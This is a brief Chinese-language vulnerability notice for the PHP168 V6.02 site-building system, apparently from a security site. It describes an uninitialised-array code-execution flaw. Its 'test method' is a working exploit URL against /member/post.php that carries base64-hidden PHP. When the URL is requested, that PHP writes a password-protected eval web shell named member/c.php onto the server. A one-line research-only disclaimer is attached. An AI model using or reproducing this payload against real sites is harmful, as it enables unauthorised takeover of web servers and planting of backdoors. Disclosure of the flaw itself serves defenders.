|
影响版本: PHP168 V6.02 漏洞描述: PHP168整站是PHP领域当前功能最强大的建站系统,代码全部开源,可极其方便的进行二次开发,所有功能模块可以自由安装与删除,个人用户完全免费使用。 PHP168在某数组没有初试化,导致可以提交任意代码执行。 测试方法: [www.safe.sh] 本站提供程序(方法)可能带有攻击性, 仅供安全研究与教学之用,风险自负! /member/post.php?only=1&showHtml_Type[bencandy][1]={${fputs(fopen(base64_decode(Yy5waHA),w),base64_decode(PD9waHAgQGV2YWwoJF9QT1NUW2NdKTsgPz4x))}}&aid=1&job=endHTML 直接在该目录生成个member/c.php 密码为c |
|
|
